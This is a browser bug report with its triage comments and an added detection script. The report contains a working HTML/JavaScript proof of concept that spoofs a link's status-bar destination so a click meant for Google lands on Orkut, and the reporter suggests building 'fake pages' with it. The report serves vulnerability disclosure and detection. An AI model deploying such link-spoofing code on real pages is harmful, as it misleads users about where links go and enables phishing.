One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!

RESOLVED DUPLICATE of bug 474967

Severity: major
Reporter: vag_bracker
Assignee: Unassigned
Firefox Tracking Flags: Not tracked

Description

9 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: ALL

Look at this code, save it as .html and open it in the browser! ;)


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.orkut.com.br';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Barra de Status Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">☻</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Você clicará na página do google e será direcionada para a página do orkut! (O.O)</font><br>
<br>
<a href="http://www.google.com.br" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com.br</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Falha muito perigosa não acha? ELA NÃO FUNCIONA SE VOCÊ MANDAR ABRIR A PAGINA POR UMA NOVA ABA!!!</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Veja aqui...<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>



Try it and see! xD
If you disable JavaScript it doesn't work!
Cheers

Reproducible: Always

Steps to Reproduce:
1. Develop the code in JavaScript
2. Build some page using the method!
3. Have a party with fake pages!
Actual Results:  
Maybe some people who know about it are using it for personal ends!


I hope this has helped everyone, and that I have expressed myself correctly! Cheers!
And good luck!

I accept job offers! ^^
I'm 15 years old!
This is not "clickjacking". This code obscures the destination of a link (there are many ways to do that, such as redirects) but you are not hiding the existence of a 3rd party page containing the link.

I've seen this example elsewhere; this is a duplicate. (Also, it would be easier to achieve the same results by having the onclick just set document.location than to mess with moving the div around. Moving the div makes it superficially similar to clickjacking, but it isn't, really.)
Group: core-security
Summary: Uma Maneira de Camuflar Links na StatusBar! QUando ocorre o OnMouse sobre o link! O Preview é modificado! → One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Whiteboard: DUPEME
I guess I was remembering http://www.exploit-db.com/exploits/7842 from earlier in the year this was filed.
Alias: CVE-2009-0253
Whiteboard: DUPEME
Alias: CVE-2009-0253
Status: UNCONFIRMED → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 474967
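
Added example (not part of the original report and not Mozilla code): a static review heuristic that flags inline event handlers navigating to a host that none of the page's visible links advertise, which covers both the mouseover pattern in the report and the simpler onclick variant mentioned in the comment. The function names, the regexes and the sample markup with `.example` hosts are assumptions constructed here.

```javascript
// Heuristic only: it inspects inline on* attributes in static markup and does
// not see handlers attached from script (addEventListener, element.onclick = ...).
const HANDLER_RE = /\son([a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
const NAV_RE = /(?:document\.|window\.|top\.|self\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\1/i;
const HREF_RE = /<a\b[^>]*?\shref\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;

// Return the lowercase hostname of an absolute URL, or null if it does not parse.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// List inline handlers that send the browser to a host no <a href> points at.
function findHiddenNavigations(html) {
  const advertised = new Set();
  for (const m of html.matchAll(HREF_RE)) {
    const h = hostOf(m[1] ?? m[2]);
    if (h) advertised.add(h);
  }
  const findings = [];
  for (const m of html.matchAll(HANDLER_RE)) {
    const nav = NAV_RE.exec(m[2] ?? m[3]);
    if (!nav) continue; // handler does not assign to location
    const host = hostOf(nav[2]);
    if (host && !advertised.has(host)) {
      findings.push({ event: 'on' + m[1].toLowerCase(), target: nav[2], host });
    }
  }
  return findings;
}

// Constructed sample: the status bar would show visible.example, while an
// element's mouseover handler navigates elsewhere.
const SAMPLE = `
<div id="cover" onmouseover="document.location='http://other.example/';"></div>
<a href="http://visible.example/" onclick="moveCover(event)">http://visible.example/</a>`;

// Constructed benign sample: the handler stays on the advertised host.
const BENIGN = `
<a href="http://visible.example/a">a</a>
<button onclick="location.href='http://visible.example/b'">go</button>`;

console.log(findHiddenNavigations(SAMPLE));
console.log(findHiddenNavigations(BENIGN));
```
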